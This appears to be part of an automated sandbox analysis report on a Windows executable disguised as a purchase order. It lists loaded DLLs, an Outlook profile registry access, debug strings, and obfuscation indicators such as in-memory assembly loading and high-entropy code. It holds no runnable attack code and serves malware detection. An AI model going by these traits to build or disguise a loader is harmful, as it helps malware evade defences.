                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb< source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531945426.0000000006249000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbL~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Security.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
                Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Drawing.pdbpO& source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Core.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: >*OoVisualBasic.pdb! source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Web.Extensions.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: mscorlib.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: mscorlib.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Core.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Windows.Forms.pdblZ source: WERE482.tmp.dmp.15.dr
                Source: Binary string: O1.PDB source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
                Source: Binary string: uc.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Web.pdb source: WERE482.tmp.dmp.15.dr

                Data Obfuscation

                barindex
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.cs.Net Code: lqAGkHILDP System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_0584F8B0 push eax; ret 0_2_0584F8B9
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05878D21 pushad ; retn 0005h0_2_05878D22
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05878D38 pushad ; retn 0005h0_2_05878D3A
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05878CC9 pushad ; retn 0005h0_2_05878CCA
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 0_2_05878F41 pushad ; retn 0005h0_2_0587916A
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_0280891E pushad ; iretd 4_2_0280891F
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_02808C2F pushfd ; iretd 4_2_02808C30
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_02808DDF push esp; iretd 4_2_02808DE0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4_2_066A890D push es; ret 4_2_066A8920
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: section name: .text entropy: 7.879454728675969
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, LQ6roNfahGT40yedGd.csHigh entropy of concatenated method names: 'ToString', 'f7KVuH7auJ', 'oBVVPcp3Ud', 'raXVNPVD6q', 'KqJV2cPd1v', 'vuOVc9w8O8', 'usgVxr9Mys', 'AMCVpyU1k8', 'fVUV1oICym', 'tNsV6ahykR'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yuQsZhCGlQrIOb1MOYI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MYTqA0aKZe', 'pWwq4wQH0F', 'fsOqTxXfpS', 'ySrqq8Dx5i', 'QrWqY1YXa6', 'MdsqjsU0rb', 'dqxqOJK34U'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, X3OpRrp6A5Qw3QnkEK.csHigh entropy of concatenated method names: 'YxcvbuNtqa', 'jUmvHFZh3c', 'LGEv8bB8ah', 'P9n8iG8wfV', 'z8Z8zLbMRh', 'xGdvFFcC3d', 'u7fvC43uOV', 'gfNvWvyO5r', 'qifvoSRn7q', 'NrEvGVcRvc'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, T53eivCF2caXpDovmJb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ngw4ui1In6', 'wNe4I4xwTc', 'di84sL5qaH', 'EKm4ykOW0s', 'bU64JkEM2C', 'pR24fJyZAh', 'Ne14QZ3UD5'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, B6ddq9wkjH5U7GO4pH.csHigh entropy of concatenated method names: 'QoTA08276H', 'WMQA7bTxU6', 'QpKAA27yI4', 'P9dATa3onr', 'h0mAYnbQiw', 'TvhAOf1J2t', 'Dispose', 'QI1UbpjGGo', 'jafUEh9mVt', 'UxtUHyhAbE'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, dCk3WECCKpf7Djs99PP.csHigh entropy of concatenated method names: 'YN14iAE069', 'FFB4zchI35', 'sPjTFJSU1H', 'yoTTCtls2P', 'GmfTWZPOQl', 'hAkToJYqvA', 'X2JTGFh0c8', 'jOLTgjCsHi', 'F8iTbTgEAE', 'o0qTEqn0LD'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, lPcJcDyYH8caUrYvem.csHigh entropy of concatenated method names: 'HMU0aY4RfS', 'zvj0Ixmo8C', 'MJ20yEXnop', 'bKv0Jxjwg8', 'uya0PLm16v', 'WGU0NBo4aC', 'xfp02cdqTw', 'kZx0cmrIvN', 'xGE0xu5Sfb', 'pbQ0pA76ZE'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, FAjkdqRXgX4wHWn7Nu.csHigh entropy of concatenated method names: 'TNVHDehN3w', 'AtrHhtmKpn', 'BrvHelvhJx', 'tNjHRNZ8gp', 'CN5H0JSTei', 'EyhHVKn0Hx', 'GaIH7U5uYo', 'tXHHUTUPAq', 'XV8HAGMduf', 'TW5H4q8VHN'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, SlepaGs6lOpi5ORLFD.csHigh entropy of concatenated method names: 'TeI9eNPMH9', 'dhZ9RxeR3w', 'J5B9SIlHu0', 'A2P9PorxLI', 'zit926VpZk', 'gna9co1rjd', 'BgV9pO9h80', 'ej191H76gF', 'zdP9aCaeAM', 'ohL9uQ4ulh'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, x9Zb7eEX75vLyTwYnf.csHigh entropy of concatenated method names: 'Dispose', 'h5UCd7GO4p', 'eLFWPmmimh', 'wNnroxOd8j', 'gEvCirxKiJ', 'GQlCzWOVh5', 'ProcessDialogKey', 'LnZWFWh876', 'wFbWC4mgoa', 'XQdWWYI4q7'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, otZaAEKk5BhEYRRXVl.csHigh entropy of concatenated method names: 'vrLBm9DRvw', 'SHuB3jlgrK', 'HcAHNW4fAX', 'fGaH27Mxq3', 'l0nHcliOC0', 'xHuHxsWoTc', 'ObYHpKIuJq', 'l5NH10xtrK', 'SpcH641G1v', 'KIjHaKKylg'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, bp1hNOLdohwXfjv1NC.csHigh entropy of concatenated method names: 'DXD75w5NC7', 'o6f7irSOQq', 'qZTUFcIIN0', 'utcUC6gsNK', 'I6d7udEd40', 'Deb7IyUhr8', 'BOT7s3L6YW', 'HH67ycbD4V', 'VpF7J9DFJN', 'yPZ7f3e3Np'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, SJLPAsztXMTJ1heyUK.csHigh entropy of concatenated method names: 'bSP4hC7oaV', 'AqR4eC06Yx', 'BF84RWs8VU', 'AST4SguNAu', 'yXE4PFLFPD', 'esw42uBoCy', 'Cr04cLAf6A', 'd9u4OhYl67', 'CVO4txYU8R', 'orJ4l3RB3u'
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, ynV3YtGGBGZi2W5ZXK.csHigh entropy of concatenated method names: 'OshCvXfOJm', 'HvhCnyHxF6', 'uXgCXX4wHW', 'k7NCMu0tZa', 'ERXC0Vl16p', 'DkLCV4158n', 'UhhtSvHHgsAExc27iw', 'Aeug4xvZgiBkkbRqhr', 'PPyCC6O3mH', 'ipsCoJDiVb'
